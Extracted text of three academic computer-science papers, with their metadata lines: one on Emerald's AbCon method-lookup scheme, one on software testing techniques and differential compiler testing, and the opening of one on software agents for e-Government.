type of an identifier at compile time tells us nothing about the implementation of the object to which it will be bound at run time. This is true even if the program submitted to the compiler contains only a single implementation that conforms to the declared type, because it is always possible for another implementation to arrive over the network from some other compiler. Thus, the Emerald implementation would still have to search for the appropriate method; the advantage that static typing would give us would be a guarantee that such a method existed. 1.5 More Efficient Method Lookup using The AbCon Mechanism The most dynamic form of Method Lookup is to, for a given invocation, search the concrete type for the operation that is to be invoked. Consider the example from above: ```plaintext var unknownFile: File \[ r \leftarrow (\text{view unknownFile as Directory}).Lookup("README ") \] \[ \text{result} \leftarrow r.\text{Lookup(something)} \] ``` When invoking the method `Lookup` file object assigned to `r`, the implementation can merely access the object, find its reference to its own concrete type, and then search the concrete type for the method. The Emerald implementation used several techniques to avoid this expensive dynamic search process. First, it is often the case that dataflow analysis can be used to ascertain that an object has a specific concrete type, and the Emerald compiler used dataflow analysis quite extensively to avoid method lookup altogether by compiling a direct subroutine call to the appropriate method. Second, in those cases where dataflow analysis could not assign a unique concrete type to the target expression, we avoided the cost of searching for the correct method by inventing a data structure that took advantage of Emerald's abstract typing. This data structure was called an AbCon, because it mapped Abstract operations to Concrete implementations. AbCons are the responsibility of the run-time system: it constructs an AbCon for each \langle type, implementation \rangle pair that it encountered. An object reference consists not of a single pointer, but of a pair of pointers: a pointer to the object itself, and a pointer to the appropriate AbCon, as shown in Figure 1. The AbCon is basically a vector containing pointers to some of the operations in the concrete representation of the object. The number and order of the operations in the vector are determined by the abstract type of the variable; operations on the object that are not in the variable's abstract type cannot be invoked, and so they do not need to be represented in the AbCon. In Figure 1, the abstract type `InputFile` supports just the two operations `Read` and `Seek`, so the vector is of size two, even though the concrete objects assigned to \( f \) might support many more operations. An important point is that the size of the vector and the indexes to it can be determined at compile time. For example, using Figure 1, when calling \( f.\text{Seek} \), the compiler knows the Abstract type \((\text{InputFile})\), and can thus find the index of the \( \text{Seek} \) operation and generate an indirect jump via the AbCon vector. In situation (a) in Figure 1, the call would end up at \( \text{Distfile.\text{Seek}} \). Doing the method lookup with an AbCon is thus reduced to a load of the AbCon vector Address, an indexing, and a load of the appropriate slot. AbCon vectors are, in principle, created upon assignment of a variable. In the example above, the view expression returns an object reference including a pointer to an appropriate AbCon, which is dynamically created, if necessary. It appears that we have to generate new AbCons on EVERY assignment, but in practise this is not the case. In a simple assignment between two variable of the same Abstract Type, the AbCon will be the same as both Abstract Type and Concrete Type are the same. Thus the assignment is merely copying the two pointer. This covers many assignment. In an assignment, if the Abstract Types differ, then a new AbCon needs to be generated. However, this needs only be done once for each (Abstract Type, Concrete Type) pair. AbCons increased the cost of each assignment slightly, but made operation invocation as efficient as using a virtual function table. In practice it was almost never necessary to generate them during an assignment, because the number of different concrete types that an expression would take on was limited, often to one, or just a handful. Many of the AbCons that the compiler can see are needed are generated at load time. If the compiler can deduce the concrete type of the assigned object, then it would merely insert a store of the address of the relevant AbCon and the AbCon address would be inserted into the code at load time. In this case, an assignment would be a copy of the object pointer and a store of a constant address. Furthermore, in many cases the compiler could figure out, using data flow analysis, the single concrete type of an assigned object; the compiler was therefore able to generate a direct subroutine call to the concrete operation, or even in-line the operation, if it were small. In addition, if the variable used can hold reference to one single concrete type, then the entire AbCon scheme can be elided. In such a case, the variable is implemented just like a pointer variable in C and the call is as efficient as a procedure call in C. In the case of an object of a new concrete type that arrives over the network at run time, it is necessary to generate a new AbCon dynamically, but this would typically occur in connection with the arrival of the object. 1.6 Indexing AbCons The compiler uses the following scheme to index AbCons: First, each of the operation names is mapped to a unique id which is fetched from a shared database. Second, the operations are sorted using their unique ids. Third, each operation is assigned a sequential index based on the sort. Thus the AbCon vector is dense and efficiently indexed by a small integer. 1.7 Single and Multiple Inheritance Emerald does not have inheritance in the Smalltalk or C++ sense of the word. However, the AbCon mechanism is suitable for languages with traditional single or multiple inheritance: The AbCons are generated for each pair of (interface, class). Essentially, the method lookup is done at the time that the AbCon is generated rather than upon every call. Because the interface is fixed, a call can still be executed in constant time regardless of inheritance. 1.8 Caching AbCons Each time an AbCon is to be generated, the run time system first does a double key hash lookup of the AbCon (using the unique id of the Abstract and of the Concrete Type as a double key). If the AbCon already exists, the pointer to it is returned. If it does not, a new AbCon is generated for the pair and inserted into the hash table. Thus, except for the first time an AbCon is generated, the time to find an AbCon is constant (assuming that a suitable hashing algorithm is used). Any AbCon that the compiler can see is needed, is generated at load time as the necessary is present at that time. 1.9 Performance Summary for AbCons AbCons incur overhead as follows: On assignment, some assignments are a double pointer load and store instead of one. On method calls: in the worst case, the call can be performed using a load (of the AbCon vector), a load of the content of the indexed element, and a jump to it. For calls where the compiler can deduce the Concrete Type, the call is the same as a procedure call in C. The potentially most damaging overhead is the extra storage incurred by the AbCon pointers in those variables requiring them — their storage size is doubled. This can be significant for large arrays. However, in practice, it seems that most large arrays are not used for storing polymorphic data. 1.10 Comparison with Other Schemes Compared to a contemporary language such as Smalltalk, method lookup in Emerald is much more efficient. Indeed, we achieved execution times comparable to similar C programs for a number of benchmarks ([6]). Some years later, the Self project invented the Polymorphic Inline Cache [7], which is successful at eliminating message lookup for precisely the same reason that AbCons rarely need to be generated at assignment time: the number of concrete types that an expression can take is usually small, and after the program has run for a while, the cache always hits. Alpern et al [8] give an excellent overview of previous techniques for interface dispatch. They describe an itable which is a virtual method table for a class, restricted to those methods that match a particular interface, i.e., essentially an AbCon, but indexed by method rather than an index. The problem is that for a given method lookup, the implementation first must lookup the appropriate itable that matches the interface in question, and thereafter search the itable for the method in question. Alpern et al [8] propose a new interface dispatch mechanism, called the interface method table (IMT). They propose an IMT for each class. The IMT is essentially a hash table that contains the id of interface methods and the method’s address. The IMT is populated dynamically as the virtual machine discovers that a class implements an interface; it then adds that interface’s method to the class’s IMT. As long as there is no conflict, the call sequence can merely load the appropriate address right out of the IMT and jump to the method. Because the IMT is a hash table, there is the possibility of conflict. Such a conflict is detected when a new entry into the IMT is made that conflicts with a previous entry. In such a case, the virtual machine generates a conflict resolution stub that picks the correct interface method and jumps to the correct method in the appropriate class. This scheme thus tries to combine a fast lookup while reducing the size of the IMT. However, compared to Emerald’s AbCons, even the shortest sequence for interface dispatch contains an extra load (of the id of the interface method called). And AbCons are dense (because the compiler knows the interface) and therefore shorter than the IMT hash tables, and there is no possibility of conflict (because it is not a hash table). Zendra et al [9] describe a different approach where tables are eliminated and replaced by a simple static binary branch code using a type inference algorithm. 2 Summary We describe the Emerald mechanism for precomputing method lookup to make method calls more efficient. The mechanism is made possible by having a strong type system requiring a type of all expressions and variables. Method calls can, in general, be performed quite efficiently (using only two memory loads) in constant, low time. The cost is that some variables need to have an extra pointer thus increasing space overhead and increasing the cost of assignment. And in cases where the compiler can determine the concrete type of an object, the compiler can elide the extra overhead and call the operation directly. This extra overhead can also be avoid in cases as the AbCon reference can be removed entirely. Parts of this paper has appeared in earlier Emerald articles [5,10]. References Fig. 1: This figure, taken from reference [5], shows a variable $f$ of abstract type $InputFile$. At the top of the figure (part a), $f$ references an object of concrete type $DiskFile$, and $f$'s AbCon (called an Operation vector in the legend) is a two-element vector containing references to two $DiskFile$ methods. At the bottom of the figure (part b), $f$ references an object of concrete type $InCoreFile$, and $f$'s AbCon has been changed to a two-element vector that references the correspondingly named methods of $InCoreFile$. (Figure ©1987 IEEE; reproduced by permission.)
{"Source-Url": "https://static-curis.ku.dk/portal/files/170214511/ICOOOLPS2008_paper09_Jul_final.pdf", "len_cl100k_base": 4239, "olmocr-version": "0.1.50", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 21883, "total-output-tokens": 5259, "length": "2e12", "weborganizer": {"__label__adult": 0.00035858154296875, "__label__art_design": 0.00022530555725097656, "__label__crime_law": 0.00026226043701171875, "__label__education_jobs": 0.00033473968505859375, "__label__entertainment": 4.8100948333740234e-05, "__label__fashion_beauty": 0.00013506412506103516, "__label__finance_business": 0.00014889240264892578, "__label__food_dining": 0.0003485679626464844, "__label__games": 0.00030517578125, "__label__hardware": 0.0006775856018066406, "__label__health": 0.0004055500030517578, "__label__history": 0.0001959800720214844, "__label__home_hobbies": 6.705522537231445e-05, "__label__industrial": 0.0002963542938232422, "__label__literature": 0.00022304058074951172, "__label__politics": 0.00023555755615234375, "__label__religion": 0.0004467964172363281, "__label__science_tech": 0.00540924072265625, "__label__social_life": 7.587671279907227e-05, "__label__software": 0.0034580230712890625, "__label__software_dev": 0.9853515625, "__label__sports_fitness": 0.00028705596923828125, "__label__transportation": 0.0004305839538574219, "__label__travel": 0.00020778179168701172}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 22799, 0.0313]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 22799, 0.72988]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 22799, 0.93387]], "google_gemma-3-12b-it_contains_pii": [[0, 423, false], [423, 2813, null], [2813, 6108, null], [6108, 9047, null], [9047, 12022, null], [12022, 15153, null], [15153, 17533, null], [17533, 20510, null], [20510, 22216, null], [22216, 22799, null]], "google_gemma-3-12b-it_is_public_document": [[0, 423, true], [423, 2813, null], [2813, 6108, null], [6108, 9047, null], [9047, 12022, null], [12022, 15153, null], [15153, 17533, null], [17533, 20510, null], [20510, 22216, null], [22216, 22799, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 22799, null]], "pdf_page_numbers": [[0, 423, 1], [423, 2813, 2], [2813, 6108, 3], [6108, 9047, 4], [9047, 12022, 5], [12022, 15153, 6], [15153, 17533, 7], [17533, 20510, 8], [20510, 22216, 9], [22216, 22799, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 22799, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
e8b62e4108db9cef816f11040a94fe53a81a4722
Software Testing: Perception on Exploration and Ad-libbing SANJEEV DHAWAN*, KULVINDER S. HANDA*, RAKESH KUMAR** *Faculty of Computer Engineering, University Institute of Engineering & Technology (U.I.E.T), Kurukshetra University, Kurukshetra (K.U.K)- 136 119, Haryana, INDIA. **Faculty of Computer Science, Department of Computer Science and Applications (D.C.S.A), Kurukshetra University, Kurukshetra (K.U.K)- 136 119, Haryana, INDIA. E-mail: rsdhawan@rediffmail.com Abstract: - Developing software, which is free from faults, remains one of the most challenging and fundamental problems in software engineering. To realizing the precise need of software architectures, researchers have pursued formal methods, mathematically based notations, techniques, and tools for correctly documenting the software. Despite the availability and potential benefits of formal methods, the use of such methods is still far from the routine practices. There are numerous reasons, involving issues such as the complexity of the languages and tools, lack of expertise, and the existing software development culture. Perhaps most importantly, the use of formal methods is widely considered to be expensive, which prohibits their use for most of the critical systems. As a result of these cost issues, practicing software engineers have largely avoided formal methods, instead relying on testing. Despite the costs associated with identifying good candidate test cases, running the tests, and validating the results, developers rely upon testing as their primary method of ensuring software dependability. Key-Words: - Software architecture, software testing, test generation, test distribution, test analysis, test reduction 1 Introduction Testing is a crucial part of the software life cycle, and recent trends evidence the importance of this activity along the whole development process. The testing activities have to start at the requirement specification level and have to be propagated down to the code-level, all along the various subsequent refinement steps. Testing involves several demanding tasks: the ability to launch the selected tests (in a controlled host environment, or worse in the tight target environment of an embedded system); deciding whether the test outcome is acceptable or not (which is referred to as the test oracle problem). Therefore, the impacts of failure cost in direct cause (the fault), and the indirect one (root cause analysis). However, the problem that has received the highest attention in the literature is to select an appropriate test case. In brief, how to identify a suite of test cases that is effective in demonstrating that the software behaves as intended, or, otherwise, in evidencing the existing malfunctions. Clearly, a good test suite is in fact the crucial starting point to a successful testing session. In contrast with the conventional practice of handcrafted ad-hoc test cases, or of random input generation, many methods for systematic test selection have been proposed in the past decades. No method is superior to the others, thus several methods should be used in combination throughout the lifecycle, with focus shifting, as development proceeds, on differing aspects of software behavior, and also on differing projections of the system. The term model-based testing refers to test case derivation from a model representing the software behavior. Indeed, testing is always against an expected behavior: the difference being essentially whether such a model is explicit (which is clearly better), or implicit, i.e., in the mind of the testers. In particular, when there exists a specification of the system to be tested in some formal language, this can be used as the reference model both for test-case selection and as a test oracle. This allows for rigorous mathematical analysis, and automated processing. Testing an implementation against its formal specifications is also known as conformance testing, which, looking at the big picture of test strategies belongs to the black box class, because we do not consider the internals of a system, but only its input/output behavior. After the test cases are derived from the specifications, two major problems remain to be solved: traceability and test execution. Traceability concerns “relating the abstract values of the specification to the concrete values of the implementation”. To be able to execute these tests on the code, we need to refine the test cases into more concrete sequences that have a meaningful interpretation in terms of the actual system I/O interface. Test execution entails forcing the Implementation Under Test (IUT) to execute the specific sequence of events that has been selected. A problem rises with concurrent programs which, starting from the same input, may exercise different sequences of interactions (among several concurrent processes) and produce different results. This problem has already been analyzed in the literature, and deterministic- and non-deterministic-testing approaches have been proposed. In non-deterministic testing [1], the approach is to repeat the launching of a program run under some specified input conditions several times until the desired test sequence is observed (or a maximum number of iterations are reached). In contrast, the deterministic testing approach forces a program to execute a specified test sequence by instrumenting it with synchronization constructs that deterministically reproduce the desired sequence. 2 Software Architecture and Testing Software architecture (SA) represents the most promising approach to tackle the problem of scaling up in software engineering, because, through suitable abstractions, it provides the way to make large applications manageable. Nowadays, SA descriptions are commonly integrated into the software development process; SA production and management are, in general, quite expensive tasks. Therefore the effort is worthwhile if the SA artifacts are extensively used for multiple purposes. Typical use of SA is as a high-level design blueprint of the system to be used during system development and later on for maintenance and reuse. In particular, the importance of the role of SA in testing and analysis is evident. SA formal dynamic descriptions are used for many different kinds of analysis. We are here interested in SA primarily as a means for driving the testing of large, complex systems. Our concern is on exploiting the information described at the SA level to drive the testing of the implementation. How formal SA descriptions (and the obtained models) can be used for testing purposes [2]. In other words, we assume the SA description is correct and we are investigating approaches to specification-based integration and system testing [3], whereby the reference model used to generate the test cases is the SA description [4][2]. Figure shown below provides a useful hierarchical decomposition of different testing techniques and their relationship to different classes of test adequacy criteria. ![Hierarchical Decomposition of Testing Techniques](image1) **Fig. 1.** Shows the hierarchical decomposition of different testing techniques 2.1 Fault Detection This is something that is quite beyond most current testing methods. The claim “the system/component is fault-free” is quite beyond current testing methods. In practice all we can usually say is that we have uncovered a number of faults over a period of testing effort and the graph of the number of faults against the period or amount of testing, measured suitably, indicates that the growth rate is reducing. Figure 2 shows the relationship between fault detection and test time. The trouble is we do not know that no further faults are in the system at any particular time. Also, in general we cannot assert that the only faults remaining are located in a specific module or component. A general formula for this curve is not known, if one existed it would probably depend on the type of system, on the type of test methods and perhaps on the people doing and managing the testing as well as wider issues relating to the management of the design project, the attitudes of the clients, the implementation vehicle, the design methods and so on. ![Fault Detection and Test Time](image2) **Fig. 2.** Shows the relationship between fault detection and test time High quality empirical results obtained over a very long period would be needed to make proper use of this approach even then it is less than ideal. 2.2 Effectiveness of Test The problem of measuring the effectiveness of an individual testing project usually depends on estimating the coverage of the tests [5]. For example, if the tests are structurally based, using program charts, say, then popular methods include establishing that every path has been exercised or every decision node has been visited. This does not tell us anything about fault detection; it merely measures effort rather than reward! The current accepted definition of fault coverage is misleading since it is not the case that a precise measure can be placed on the number of faults that remain after the test process has been applied. In most cases the definition of fault coverage is based on assumptions of the type described above, that we are questioning. In much of the literature the estimates of the fault coverage are obtained by running experiments with simple examples involving implementations that have faults seeded in them and counting the numbers of known faults detected by the methods. These empirical results are of curiosity value only. Miller & Paul provide a theoretical method for establishing fault coverage of a test strategy; however, they assume that the implementation machine has the same number of states as the specification machine. Before we look, briefly, at what progress there has been in addressing some of the theoretical issues of testing we will consider a popular method for the analysis and comparison of the effectiveness of different testing methods. 2.3 Test Method Effectiveness A number of authors have sought to compare the effectiveness of, for example, random testing methods with formally based functional testing [1]. Here the method was to take a small system and to insert known faults into it, then to apply the two techniques to establish which was most successful at detecting these faults. Further analysis could be done on the type of faults each method was good or poor at detecting. Faults were classified for this purpose in a number of categories. Results from this type of survey can be useful in establishing the relative strengths and weakness of different, specific methods of test set generation. However, the situation is essentially artificial and it is not clear what can be said in general. The method is unable to prove, for example, that either approach is better at detecting naturally occurring or unseeded faults (the seeded ones may not be typical of real faults), or to identify conditions under which a method detects all faults. A number of attempts at developing a theory of testing or to analyze the testing situation have been made. We will briefly consider few of them as follows: 2.3.1 An Algebraic Approach to Computational Modeling The process of software design, including within that activity all phases of requirements capture, specification, design, prototyping, analysis, implementation, validation, verification and maintenance is one that is oriented, or should be, around the construction of computational solutions to specific problems. When we are constructing a software system (this also applies to hardware) we are attempting to construct something that will, when operating, carry out some computable function. Consequently it is worth considering what this means. Essentially, computable functions have been identified as the functions computed by Turing machines. The method will not be applicable to implementations that behave like a Turing machine that does not halt. In other words we will not try to deal with those systems that regress into an infinite loop from which no output emanates, for our purposes these systems will be deemed to be unacceptable anyway. A way to establish that a system is not of this form is to identify a period of time, which is the maximum that the system can run for without producing any detectable output. We will also assume that the specification of the system is also of this form, namely a Turing machine that halts under its intended operating conditions. Real-time systems are covered by this definition since we require that the specified system does have detectable behavior under all conditions. This is a kind of design for test condition that we will see more of later. We then have two algebraic objects, the Turing machine representing the specification of the desired system and the Turing machine representing the complete implementation. A testing method would then try to ascertain if these two machines computed the same function. This is a basic strategy that we will develop, however, not in the context of a Turing machine, which is too low level and unwieldy, but in the context of a more useful, elegant and equivalent model. In so doing we will quote some important theoretical results that justify what we are doing. It is important to stress that the method of finite state machine testing proposed by Chow, and developed by a number of other authors is based on a similar sort of philosophy, the difference being that they have to make very strong assumptions about the nature of the implementation machine. However, their work did act as an important inspiration for our own platform testing for the finite state machines. 2.3.2 Model-based Testing Simply put, a model of software is a depiction of its behavior. Behavior can be described in terms of the input sequences accepted by the system, the actions, conditions, and output logic, or the flow of data through the application’s modules and routines. In order for a model to be useful for groups of testers and for multiple testing tasks, it needs to be taken out of the mind of those who understand what the software is supposed to accomplish and written down in an easily understandable form. It is also generally preferable that a model be as formal as it is practical. With these properties, the model becomes a shareable, reusable, precise description of the system under test. There are numerous such models, and each describes different aspects of software behavior. For example, control flow; data flow, and program dependency graphs express how the implementation behaves by representing its source code structure. Decision tables and state machines [6], on the other hand, are used to describe external so-called black box behavior. When we speak of MBT, the testing community today tends to think in terms of such black box models. 2.3.3 Differential Testing Differential testing addresses a specific problem—the cost of evaluating test results. Every test yields some result. If a single test is fed to several comparable programs (for example, several C compilers), and one program gives a different result, a bug may have been exposed. For usable software, very few generated tests will result in differences. Because it is feasible to generate millions of tests, even a few differences can result in a substantial stream of detected bugs. The trade-off is to use many computer cycles instead of human effort to design and evaluate tests. Particle physicists use the same paradigm: they examine millions of mostly boring events to find a few high-interest particle interactions. Several issues must be addressed to make differential testing effective [4]. The first issue concerns the quality of the test. Any random string fed to a C compiler yields some result—most likely a diagnostic. Feeding random strings to the compiler soon becomes unproductive, however, because these tests provide only shallow coverage of the compiler logic. Developers must devise tests that drive deep into the tested compiler. The second issue relates to false positives. The results of two tested programs may differ and yet still be correct, depending on the requirements. Similarly, even for required diagnostics, the form of the diagnostic is unspecified and therefore difficult to compare across systems. The third issue deals with the amount of noise in the generated test case. Given a successful random test, there is likely to be a much shorter test that exposes the same bug. The developer who is seeking to fix the bug strongly prefers to use the shorter test. The fourth issue concerns comparing programs that must run on different platforms. Differential testing is easily adapted to distributed testing. 3 Need of Generating Tests The difficulty of generating tests from a model depends on the nature of the model. Models that are useful for testing usually possess properties that make test generation effortless and, frequently, automatable. For some models, all that is required is to go through combinations of conditions described in the model, requiring simple knowledge of combinatorics. In the case of finite state machines, it is as simple as implementing an algorithm that randomly traverses the state transition diagram. The sequences of arc labels along the generated paths are, by definition, tests. For example, in the state transition diagram below, the sequence of inputs “a, b, d, e, f, i, j, k” qualifies as a test of the represented system. ![State Transition Diagram](image) Fig. (3) shows the state transition diagram There are a variety of constraints on what constitutes a path to meet the criteria for tests. Examples include having the path start and end in the starting state, restricting the number of loops or cycles in a path, and restricting the states that a path can visit. While writing the automation code, adherence to good engineering practices is required. Scripts are bound to interact with each other and evolve as the software evolves. Scripts can be used for as long as the software is being tested, so it worth while investing some time in writing good, efficient ones. With model-based testing, the number of simulation routines is in the order of the number of inputs, so they are generally not too time-consuming to write [7]. 4 Test Distribution Each tested or comparison program must be executed where it is supported. This may mean different hardware, operating system, and even physical location. There are numerous ways to utilize a network to distribute tests and then gather the results. One particularly simple way is to use continuously running watcher programs. Each watcher program periodically examines a common file system for the existence of some particular files upon which the program can act. If no files exist, the watcher program sleeps for a while and tries again. On most operating systems, watcher programs can be implemented as command scripts. There is a test master and a number of test beds. The test master generates the test cases, assigns them to the test beds, and later analyzes the results. Each test bed runs its assigned tests. The test master and test beds share a file space, perhaps via a network. For each test bed there is a test input directory and a test output directory. A watcher program called the test driver waits until all the (possibly remote) test input directories are empty. The test driver then writes its latest generated test case into each of the test input directories and returns to its watch-sleep cycle. For each test bed there is a test watcher program that performs in the test input directory. When a test watcher finds a file to test, the test watcher runs the new test, puts the results in its test output directory, and returns to the watch-sleep cycle. Another watcher program called the test analyzer waits until all the test output directories contain results. Then the results, both input and output, are collected for analysis, and all the files are deleted from every test input and output directory, thus enabling another cycle to begin. Using the file system for synchronization is adequate for computations on the scale of a compile-and-execute sequence. Because of the many sleep periods, this distribution system runs efficiently but not fast. If throughput becomes a problem, the test system designer can provide more sophisticated remote execution. The distribution solution as described is neither robust against crashes and loops nor easy to start. It is possible to elaborate the watcher programs to respond to a reasonable number of additional requirements. 5 Test Analysis The test analyzer can compare the output in various ways. The goal is to discover likely bugs in the compiler under test. The initial step is to distinguish the test results by failure category, using corresponding directories to hold the results. If the compiler under test crashes, the test analyzer writes the test data to the crash directory. If the compiler under test enters an endless loop, the test analyzer writes the test data to the loop directory. If one of the comparison compilers crashes or enters an endless loop, the test analyzer discards the test, since reporting the bugs of a comparison compiler is not a testing objective. If some, but not all, of the test case executions terminate abnormally, the test case is written to the ABEND directory. If all the test cases run to completion but the output differs, the case is written to the test diff directory. Otherwise, the test case is discarded. 6 Test Reduction A tester must examine each file test case to determine if it exposes a fault in the compiler under test. The first step is to reduce the test to the shortest version that qualifies for examination. A watcher called the crash analyzer examines the crash directory for files and moves found files to a working directory. The crash analyzer then applies a shortening transformation to the source of the test case and reruns the test. If the compiler under test still crashes, the original test case is replaced by the shortened test case. Otherwise, the change is backed out output, are collected for analysis, and all the files are deleted from every test input and output directory, thus enabling another cycle to begin. Using the file system for synchronization is adequate for computations on the scale of a compile-and-execute sequence. Because of the many sleep periods, this distribution system runs efficiently but not fast. If throughput becomes a problem, the test system designer can provide more sophisticated remote execution. The distribution solution as described is neither robust against crashes and loops nor easy to start. It is possible to elaborate the watcher programs to respond to a reasonable number of additional requirements. 7 Generator of Test Data Testing the functional requirements of the software, i.e. the relationship between input and output, to check non-functional requirements like temporal constraints and a test adequacy criterion. There exist many of them. For example, in the statement coverage we require all the statements in the program to be executed. On the other hand, branch coverage requires taking all the branches in the conditional statements. The same test adequacy criterion is taken in condition-decision coverage. To fulfill this criterion all conditions must be true and false at least once after executing all the set of test data on it. A condition is an expression that is evaluated during the program execution to a Boolean value (true or false) with no other nested conditions. All the comparison expressions are conditions. On the contrary, a decision is a Boolean expression whose value affects the control flow. It is important to note that full condition-decision coverage implies full branch coverage but not vice versa. That is, if we find a set of test inputs that makes true and false all the program conditions at least once we can ensure that all the decisions will take values true and false and, in consequence, that all branches will be taken; but taking all branches does not ensure that all conditions take the two Boolean values. 8 Conclusions and Predictions Testing is an important technique for the improvement and measurement of a software system’s quality. Any approach to testing software faces essential and accidental difficulties. While software testing is not an elixir that can guarantee the production of high quality applications. However, the theoretical and empirical investigations have shown that the rigorous, consistent, and intelligent application of testing techniques can improve software quality. Software testing normally involves the stages of test case specification, test case generation, test execution, test adequacy evaluation, and regression testing. Each of these stages in our model of the software testing process plays an important role in the production of programs that meet their intended specification. The body of theoretical and practical knowledge about software testing continues to grow as research expands the applicability of existing techniques and proposes new testing techniques for an ever-widening range of programming languages and application domains [8]. References:
{"Source-Url": "http://www.wseas.us/e-library/conferences/2009/baltimore/MACMESE/MACMESE-15.pdf", "len_cl100k_base": 4742, "olmocr-version": "0.1.53", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 19125, "total-output-tokens": 5420, "length": "2e12", "weborganizer": {"__label__adult": 0.00030684471130371094, "__label__art_design": 0.0002803802490234375, "__label__crime_law": 0.0003063678741455078, "__label__education_jobs": 0.0007319450378417969, "__label__entertainment": 4.756450653076172e-05, "__label__fashion_beauty": 0.00012946128845214844, "__label__finance_business": 0.0001183152198791504, "__label__food_dining": 0.00032639503479003906, "__label__games": 0.0005617141723632812, "__label__hardware": 0.0005998611450195312, "__label__health": 0.00035071372985839844, "__label__history": 0.000141143798828125, "__label__home_hobbies": 6.014108657836914e-05, "__label__industrial": 0.0002434253692626953, "__label__literature": 0.0002522468566894531, "__label__politics": 0.00016379356384277344, "__label__religion": 0.0003740787506103515, "__label__science_tech": 0.007099151611328125, "__label__social_life": 6.4849853515625e-05, "__label__software": 0.004955291748046875, "__label__software_dev": 0.98193359375, "__label__sports_fitness": 0.0002512931823730469, "__label__transportation": 0.000301361083984375, "__label__travel": 0.00016260147094726562}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26788, 0.02634]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26788, 0.66926]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26788, 0.93218]], "google_gemma-3-12b-it_contains_pii": [[0, 4422, false], [4422, 8362, null], [8362, 13557, null], [13557, 17921, null], [17921, 23040, null], [23040, 26788, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4422, true], [4422, 8362, null], [8362, 13557, null], [13557, 17921, null], [17921, 23040, null], [23040, 26788, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26788, null]], "pdf_page_numbers": [[0, 4422, 1], [4422, 8362, 2], [8362, 13557, 3], [13557, 17921, 4], [17921, 23040, 5], [23040, 26788, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26788, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
c3d65c1cb3e4bca3d435849e0780158da17460ff
Perspectives for using software agents in e-Government applications Zbigniew Piotrowski* Faculty of Computer Science and Information Systems, Szczecin University of Technology, Żołnierska 49, 71-210 Szczecin, Poland Abstract Governing a country includes a set of decentralised processes. Moreover, in the unions of countries with integrated economic space, the decentralisation issue gains the attention. The most known examples of federated governments are two of the biggest world economies: the United States of America and the European Union. The decentralisation is even more significant when considering resources for businesses. Specifically the workforce, the land and the infrastructure are commonly managed at the local or the sub-local level. The paper addresses the issues concerning citizens’ mobility (both for personal and professional purposes) and businesses’ pan-European operations. Application of autonomous software agents to aid cross-border businesses operations and citizens movements is addressed. The paper presents the possibility of making citizens’ movements smoother and involving less paperwork. To support these ideas, the foundations and conclusions from Infocitizen initiative are introduced. In the conclusions of the paper, it is suggested that the agent-based technology for opening agents-ready virtual offices by agencies at all levels of government should be used. It would benefit the users if they were allowed to set up software agents to act on their behalf and to search all possible locations in order to find required resources. The mentioned task would be impossible or extremely resource-consuming when done manually. 1. Introduction The purpose of the Lisbon Strategy, drawn up by the European Union (EU), is to make European economy the world’s most competitive economy in terms of innovation, social inclusion, liberalisation and enterprise environment. The competitiveness of the EU is still behind the world’s most developed economies which are the USA and a group of “Asian tigers”: Japan, Hong Kong, the Republic of Korea, Singapore and Taiwan. In 2006 the EU average indicators were still far behind the leaders in the vast majority of analysed categories. To face that challenge, in February 2005 the Lisbon Strategy was re-launched with *e-mail address: zpiotrowski@wi.ps.pl new guidelines. The “Working together for growth and jobs” [1] strategy directs the main effort of the EU to make Europe a more attractive place to invest and work. To achieve that goal the EU needs to improve regulations and create a consistent single market without any obstacles. Switching to Euro – the common currency of European countries – was the first step in creating an integrated market covering the whole continent. Moreover, the consistency of law systems and freedom of operations is considered as the main factor which decides about 